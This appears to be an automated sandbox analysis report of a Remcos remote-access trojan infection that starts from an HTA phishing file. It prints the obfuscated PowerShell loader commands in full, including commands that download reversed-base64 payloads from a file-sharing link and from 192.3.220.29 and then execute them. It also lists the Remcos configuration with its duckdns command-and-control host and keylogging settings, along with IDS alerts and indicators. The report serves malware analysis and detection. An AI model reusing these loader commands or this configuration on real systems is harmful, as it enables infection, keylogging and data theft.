-'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+

                    Data Obfuscation

                    barindex
                    Sigma detected: Dot net compiler compiles file from suspicious location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline", ProcessId: 7388, ProcessName: csc.exe

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 8052, TargetFilename: C:\ProgramData\remcos\logs.dat

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T17:18:45.714020+010020204251Exploit Kit Activity Detected192.3.220.2980192.168.2.749765TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T17:18:45.714020+010020204241Exploit Kit Activity Detected192.3.220.2980192.168.2.749765TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T17:18:48.453341+010020365941Malware Command and Control Activity Detected192.168.2.749773192.3.101.1496946TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T17:17:59.828215+010020576351A Network Trojan was detected192.3.220.2980192.168.2.749765TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T17:18:26.927761+010020490381A Network Trojan was detected142.215.209.78443192.168.2.749713TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T17:18:51.453797+010028033043Unknown Traffic192.168.2.749779178.237.33.5080TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T17:17:59.828215+010028582951A Network Trojan was detected192.3.220.2980192.168.2.749765TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T17:18:45.308579+010028587961A Network Trojan was detected192.168.2.749765192.3.220.2980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T17:18:14.218612+010028587951A Network Trojan was detected192.168.2.749699192.3.220.2980TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000012.00000002.3689257366.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["banaya.duckdns.org:6946:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VCYBO3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                    Multi AV Scanner detection for submitted file
                    Source: seethebestthignswhichgivingbestopportunities.htaReversingLabs: Detection: 21%
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3693144012.00000000027BE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3689257366.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,18_2_0043293A
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_ea1f77c1-9

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00406764 _wcslen,CoGetObject,18_2_00406764

                    Phishing

                    barindex
                    Yara detected HtmlPhish44
                    Source: Yara matchFile source: seethebestthignswhichgivingbestopportunities.hta, type: SAMPLE
                    Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.7:49713 version: TLS 1.2
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1302780296.00000000034A8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000010.00000002.1715001566.0000000006DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1715770079.000000000734B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: q;C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.pdb source: powershell.exe, 00000001.00000002.1414653804.00000000053ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1310602122.0000000008B14000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000010.00000002.1715001566.0000000006DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1715770079.000000000734B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000010.00000002.1715770079.000000000734B000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,18_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,18_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,18_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044D5E9 FindFirstFileExA,18_2_0044D5E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,18_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00406AC2 FindFirstFileW,FindNextFileW,18_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,18_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,18_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,18_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,18_2_00406F06

                    Software Vulnerabilities

                    barindex
                    Suspicious execution chain found
                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.7:49699 -> 192.3.220.29:80
                    Source: Network trafficSuricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.7:49765 -> 192.3.220.29:80
                    Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 192.3.220.29:80 -> 192.168.2.7:49765
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 192.3.220.29:80 -> 192.168.2.7:49765
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49773 -> 192.3.101.149:6946
                    Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 192.3.220.29:80 -> 192.168.2.7:49765
                    Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.220.29:80 -> 192.168.2.7:49765
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.7:49713
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: banaya.duckdns.org
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: banaya.duckdns.org
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/HDRDDG.txt HTTP/1.1Host: 192.3.220.29Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 192.3.220.29 192.3.220.29
                    Source: Joe Sandbox ViewIP Address: 142.215.209.78 142.215.209.78
                    Source: Joe Sandbox ViewIP Address: 192.3.101.149 192.3.101.149
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49779 -> 178.237.33.50:80
                    Source: global trafficHTTP traffic detected: GET /45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.220.29Connection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04EC4B90 URLDownloadToFileW,1_2_04EC4B90
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.220.29Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/HDRDDG.txt HTTP/1.1Host: 192.3.220.29Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: 1017.filemail.com
                    Source: global trafficDNS traffic detected: DNS query: banaya.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 00000001.00000002.1424337882.0000000007ABE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/
                    Source: powershell.exe, 00000001.00000002.1414653804.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehaving
                    Source: powershell.exe, 00000001.00000002.1414653804.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF
                    Source: powershell.exe, 00000001.00000002.1414653804.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF0J/
                    Source: powershell.exe, 00000001.00000002.1423686161.0000000007A23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF9LMEM
                    Source: powershell.exe, 00000001.00000002.1423686161.0000000007A23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC:
                    Source: powershell.exe, 00000001.00000002.1423686161.0000000007A23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFn
                    Source: powershell.exe, 00000003.00000002.1310086977.0000000008AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftG
                    Source: CasPol.exe, CasPol.exe, 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                    Source: powershell.exe, 00000003.00000002.1303936513.000000000584F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000001.00000002.1421144583.00000000060A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1306026171.00000000063D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000001.00000002.1414653804.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303936513.0000000005371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079393910.00000000051B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000004C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000003.00000002.1310452454.0000000008AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.W?7
